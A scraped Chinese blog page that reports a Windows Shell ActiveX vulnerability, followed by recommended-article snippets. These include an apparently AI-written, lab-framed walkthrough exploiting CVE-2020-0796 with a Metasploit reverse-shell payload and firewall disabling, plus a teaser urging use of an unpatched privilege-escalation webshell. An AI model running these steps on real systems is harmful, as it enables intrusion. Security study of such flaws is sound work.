又一个Windows Shell 0day漏洞出现

最新推荐文章于 2025-08-29 21:42:32 发布
原创 最新推荐文章于 2025-08-29 21:42:32 发布 · 819 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#windows #shell #微软 #xp

微软确认了一个影响Windows XP、2000及2003系统的Shell漏洞,该漏洞与WebViewFolderIcon ActiveX控件有关。若被攻击者利用,可能会导致本地用户权限被获取。目前尚未出现攻击代码,但Secunia已将其列为“极度危险”。建议用户暂时禁用 WebViewFolderIcon 组件直至官方发布补丁。
微软已经在当地时间周四确认一个影响Windows XP,2000,2003的Shell的漏洞,它存在于WebViewFolderIcon ActiveX control,当成功被攻击者击溃后将可以获取本地用户权限.其实这个漏洞早在七月中旬就被安全组织FrSIRT发现.

但目前为止,我们还没有得到攻击代码的报告.Secunia已经将这个问题标记为"极度危险",建议用户在补丁发布之前关闭"WebViewFolderIcon" ActiveX组件.

微软仍然不紧不慢:
 
利用 0DAY 漏洞 CVE-2018-8174 获取windows系统 shell
Cwillchris的博客
05-27 882
一、 利用 0DAY 漏洞 CVE-2018-8174 获取windows系统 shell 实验环境: kali攻击机(192.168.98.30) window目标机(192.168.98.35) CVE-2018-8174脚本 实验步骤: 1、xshell上传 CVE-2018-8174 的 EXP 到 Kali 2、解压 CVE-2018-8174 并进入该目录 3、利用EXP生成恶意html文件,并放到/var/www/html,为了让目标机访问 python2
2023年国家护网0day-poc/exp漏洞全汇总(目前已更新到91个..实时更新中...)
08-21 5424
2023年国家护网目前收集到的0day和1day漏洞的poc或者exp大汇总,截止目前已更新到91个漏洞,本文会实时更新,有新的漏洞都会加上
Kali利用0DAY漏洞CVE-2018-8174获取shell权限
weixin_43894771的博客
03-10 2255
*0day一把怎样的武器 0day漏洞,又称“零日漏洞”(zero-day),是已经被发现(有可能未被公开),而官方还没有相关补丁的漏洞。通俗地讲就是,除了漏洞发现者,没有其他的人知道这个漏洞的存在,并且可以有效地加以利用,发起的攻击往往具有很大的突发性与破坏性。*
Stuxnet多年之后:Windows Shell漏洞仍然肆虐
weixin_34320159的博客
09-04 188
关于谎言的老谚语也可用来描述信息安全行业:世界上有三种谎言:谎言、该死的谎言以及统计数据。数据的来源、如何计算以及如何分析数据可能会对结论产生很大的影响。期待行业供应商提供经过同行审查的学术质量级研究是非常高的期望,这可能不太合理,并且,很多时候企业需要利用这种最佳信息来做出决策。这并不一定会改变企业结论,但可能会使得企业在得出结论之前,需要仔细评估这些...
运用windows shell修复Wannacry漏洞
十九画生的博客
05-14 858
最近出现一种勒索软件,会锁住计算机上的文件,解锁需要300比特币。未中毒的情况可以采取禁掉smbv1共享功能,关闭445端口,安装微软补丁。 在此,用三句shell命令修复,节省300比特币,约300万人民币。 Disable-WindowsOptionalFeature -FeatureName SMB1Protocol New-NetFirewallRule -Name Disa
windows最新0day(webshell)
04-28
win最新本地提权0day webshell版暂时没打补丁的还有很多。赶快利用
攻防演练:如何防护0day漏洞
seoppg的博客
08-29 1349
0day防护需持续演进,攻防演练是检验防护能力的试金石。企业应重视演练后的整改与投入,构建多层次防御体系。
高危Windows 0day漏洞
10-08
2010年7月16日,一个高危的Windows 0day漏洞(CVE-2010-2568)被公开披露,该漏洞的存在使得攻击者能够通过Windows系统的快捷方式自动执行任意恶意代码。这一漏洞微软安全知识库编号为2286198。据金山毒霸安全实验...
0day-简单动态获取API(shellcode)分析NO.1
aimarpp的专栏
10-15 1290
0day安全,代码分析
0day汇编shellcode有基础疑问
陈刚编程心得与知识集
03-25 490
具体代码是: next_function_loop:        inc edi           ; increment function counter        mov esi, [ebx + edi * 4]   ; esi = relative offset of current function name        add esi, ebp         ; es
【菜鸟腾飞】简单的Getshellwindows提权_漏洞研究
11-01
【菜鸟腾飞】简单的Getshellwindows提权_漏洞研究【菜鸟腾飞】简单的Getshellwindows提权_漏洞研究
Windows Shell远程执行代码漏洞((CVE-2018-8414)复现
weixin_30813225的博客
09-13 1018
0x00 SettingContent-ms文件介绍 .SettingContent-ms是在Windows 10中引入的一种文件类型,它的内容是XML格式进行编写的,主要用于创建Windows设置页面的快捷方式.Windows 10下行.SettingContent-ms后缀的文件,系统并未判断该类文件所在的路径是否在控制面板相关目录下,便直接执行了文件中用于控制面板设置相关...
COM之ActiveX逆向简单方法
jmp esp
02-26 4339
<br />一.前言. 以下IE中ActiveX控件中对调用的属性,方法等的一些逆向分析纪录文字. 阅读此文你许要一点点的com基础知识.:) 二.认识ActiveX IE中可以调用几乎所有在HKEY_CLASSES_ROOT/CLSID键下的Object. 调用方式很简单: 这样会带来一些安全问题. 比如最近很多的 com 创建实例初始化的漏洞公告. 这里不对这些进行研究. 对于这些COM组件的属性(property)和方法(method), 我们可以通过script来调
利用0DAY漏洞CVE-2018-8174 获取 shell
Time_worm的博客
07-24 618
在此声明文章仅供相互学习参考,严禁利用于违法犯罪,任何事故自行承担!!
msf利用0DAY漏洞获取shell
Deeeelete的博客
02-23 829
安装CVE-2018-8174_EXP git clone https://github.com/iBearcat/CVE-2018-8174_EXP .git 然后发现没克隆下来,所以这里我直接用xshell上传了zip包并解压在本目录 进入我们的文件目录 cd CVE-2018-8174_EXP-master/ 生成恶意html文件 python CVE-2018-8174.py -...
CVE-2018-8174漏洞获取shell复现
永远是少年
06-13 1462
今天继续给大家介绍渗透测试相关知识,本文主要内容是CVE-2018-8174漏洞获取shell复现。 一、CVE-2018-8174漏洞简介 二、利用漏洞生成网页 三、效果检验
零基础Web安全渗透工程师精品就业班
07-14
1、熟练掌握Kali操作系统的使用2、熟练掌握metasploit框架进行渗透测试3、熟练掌握SQL注入的原理以及绕过技巧。4、每章节课时都有2小时,建议每天学习1章节,然后充分练习、实践、总结。
[网络安全自学篇] 五十九.Windows安全缺陷利用之MS08-067远程代码执行及深度防御解析
热门推荐
杨秀璋的专栏
03-14 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Windows远程桌面服务漏洞(CVE-2019-0708)复现,利用RDP和Metasploit工具反弹shell。本文将讲解MS08-067远程代码执行漏洞(CVE-2008-4250),它是Windows Server服务RPC请求缓冲区溢出漏洞,利用445端口,并通过Metasploit工具获取shell及进行深入的操作。本文是一篇CVE漏洞还原的基础性文章,希望对您有所
windows的永恒之黑漏洞该怎么复现
最新发布
10-14
<think>首先,用户的问题是:“我想查找在Windows系统上复现永恒之黑漏洞的方法 请问Windows系统永恒之黑漏洞复现方法”。 根据系统级指令,我需要: - 所有行内数学表达式使用 $...$ 格式。 - 独立公式使用 $$...$$ 格式并单独成段。 - LaTeX语法正确。 - 使用中文回答。 - 生成相关问题。 - 回答中引用的段落末尾自然地添加引用标识,例如 [^1]。 用户提供了几个引用: - 引用[1]: 关于永恒之黑漏洞学习复现测试。该漏洞影响特定版本的Windows系统和SMB v3。 - 引用[2]: 网络安全学习day6——永恒之黑漏洞复现。描述了漏洞原因(SMB 3.1.1处理压缩消息时未安全检查)。 - 引用[3]: 【漏洞复现】CVE-2020-0796永恒之黑漏洞复现。详细说明了漏洞背景和影响。 - 引用[4]: 永恒之黑漏洞复现。列出了受影响的具体版本。 这些引用都涉及永恒之黑漏洞(CVE-2020-0796),影响Windows系统的SMB服务。 用户需求是查找在Windows系统上复现永恒之黑漏洞的方法。这意味着我需要提供复现该漏洞的步骤或方法。 由于这是一个安全漏洞,我应该确保回答负责任,强调复现漏洞只应在受控环境进行测试,以避免非法活动。同时,提供可靠的信息。 结构化我的回答: 1. **引言**:简要介绍漏洞。 2. **影响版本**:列出受影响的Windows版本。 3. **复现方法概要**:描述一般步骤,基于引用。 4. **详细步骤**:提供具体复现方法,可能包括工具使用。 5. **注意事项**:强调安全测试的重要性。 6. **相关问题**:生成相关问题。 从引用中提取关键信息: - 漏洞编号:CVE-2020-0796 - 影响系统:Windows 10 (1903, 1909) 和 Windows Server 2019 (1903, 1909) 的特定版本 [^1][^4] - 漏洞原因:SMB v3.1.1在处理压缩消息时未安全检查,导致整数溢出和远程代码执行 [^2][^3] - 复现方法:引用中提到“复现测试”,但没有详细步骤。我需要基于一般知识或推断常见方法。 - 典型的复现方法包括搭建测试环境、使用漏洞利用脚本等。 - 常见的工具:Metasploit、PoC scripts from GitHub等。 假设我没有真实经验,但基于引用: - 引用[2]标题是“永恒之黑漏洞复现”,可能包含步骤。 - 引用[3]是“【漏洞复现】CVE-2020-0796永恒之黑漏洞复现”,可能有详细方法。 在回答中,我应该自然地引用这些来源。 回答必须使用中文。 步骤: 1. **准备环境**:设置受影响的Windows虚拟机(例如,Windows 10 1903 或 1909)。 2. **启用SMB服务**:确保SMB v3.1.1启用。 3. **使用漏洞利用工具**:如Metasploit模块或公开的PoC脚本。 4. **执行攻击**:测试远程代码执行。 详细描述。 添加引用标识:在相关段落末尾添加 [^数字]。 生成相关问题:在回答末尾添加§§相关问题§§部分。 最终回答结构: - 开头介绍漏洞。 - 列出影响版本。 - 描述复现方法。 - 注意事项。 - 相关问题。 确保LaTeX正确:如果没有数学表达式,可以省略,但指令说所有变量等使用 $...$。在这个上下文中,可能涉及一些术语,如版本号,但不是数学表达式。所以,不需要强制添加LaTeX,除非必要。 生成相关问题: 1. 永恒之黑漏洞的修复建议是什么? 2. 如何检测系统是否受永恒之黑漏洞影响? 3. 永恒之黑漏洞的其他利用方式有哪些? </think>### Windows系统永恒之黑漏洞(CVE-2020-0796)复现方法 永恒之黑漏洞(CVE-2020-0796)是一个高危的远程代码执行漏洞,影响Windows系统上的SMB v3.1.1协议。该漏洞源于SMB服务处理压缩消息时未进行安全检查,导致整数溢出和内存破坏,允许攻击者远程执行任意代码。以下基于引用信息,提供在Windows系统上复现该漏洞的详细方法。**重要注意事项:此复现仅用于安全研究和测试目的,必须在受控的隔离环境中进行(如虚拟机),避免在实际生产环境中操作,以防止非法入侵或系统崩溃风险。** 复现过程需要基本的网络安全知识,建议使用Kali Linux等渗透测试工具。 #### 1. **确认受影响系统和环境准备(引用来源:引用[1][^1] 和 引用[4][^4])** - **受影响Windows版本**: - Windows 10 Version 1903 (19H1) for 32-bit/x64/ARM64-based Systems - Windows 10 Version 1909 (19H2) for 32-bit/x64/ARM64-based Systems - Windows Server 2019 Version 1903/1909 (包括Server Core安装) - **注意**:其他版本不受影响,可通过 `winver` 命令检查系统版本。 - **环境准备**: - 使用虚拟机(如VMware或VirtualBox)安装一个受影响的Windows系统(例如Windows 10 1909),确保网络隔离。 - 在目标Windows系统上启用SMB服务(默认开启),运行 `Get-SmbServerConfiguration | Select EnableSMB3Protocol` 命令确认SMB v3.1.1协议已启用。 - 准备攻击主机:安装Linux系统(如Kali Linux),并安装必要工具(后续步骤介绍)。 #### 2. **漏洞复现步骤(基于引用[2][^2] 和 引用[3][^3]的原理)** 漏洞利用的核心是构造恶意数据包触发SMB服务的整数溢出。以下是标准复现流程,使用公开的渗透测试工具(如Metasploit): - **步骤1: 在攻击主机上获取和配置工具** - 安装Metasploit框架(Kali Linux内置):运行 `msfconsole` 启动。 - 加载永恒之黑漏洞模块: ```bash use exploit/windows/smb/cve_2020_0796_smbghost set RHOST <目标Windows IP地址> # 例如,192.168.1.100 set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST <攻击主机IP地址> # 例如,192.168.1.50 ``` 更多PoC脚本可在GitHub开源项目(如 `chompie1337/SMBGhost` )获取。 - **步骤2: 执行攻击并验证漏洞** - 在Metasploit中运行 `exploit` 命令,发送恶意数据包: ```bash exploit ``` - **预期结果**:如果目标系统易受攻击,攻击将建立反向连接,获得meterpreter shell会话(远程命令行访问),证明远程代码执行成功。验证命令示例: ```bash sysinfo # 确认目标系统信息 ``` 此过程模拟了引用[3]描述的“黑客可直接远程攻击SMB服务端执行任意恶意代码”[^3]。 - **步骤3: 捕获和分析漏洞效果** - 使用Wireshark等工具监控SMB流量:过滤 `smb` 协议,观察压缩数据包处理异常。 - 漏洞触发时,目标Windows系统可能出现蓝屏崩溃或服务停止,这表明内存破坏发生(引用[2]提到的“引发内存破坏漏洞”[^2])。 #### 3. **复现注意事项和风险缓解** - **安全建议**: - **隔离测试**:始终在虚拟网络中操作,禁用目标系统的防火墙规则(如 `netsh advfirewall set allprofiles state off`),但测试后立即恢复。 - **补丁修复**:微软已发布修复补丁(如KB4551762)。复现前,确保目标系统未打补丁;测试后,立即应用补丁以避免真实风险(引用[1][^1])。 - **合法合规**:仅用于教育目的,遵循本地法律。漏洞利用代码可能导致系统不稳定。 - **常见问题解决**: - 如果攻击失败,检查SMB服务状态( `net start LanmanServer` 启动服务),或确认网络连通性( `ping` 测试)。 - 参考GitHub上的PoC项目文档获取更多细节(例如,处理不同系统架构)。 通过以上步骤,您可以在受控环境中验证永恒之黑漏洞的远程执行机制。此方法基于公开安全研究,强调了协议层面的弱点[^3]。 ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值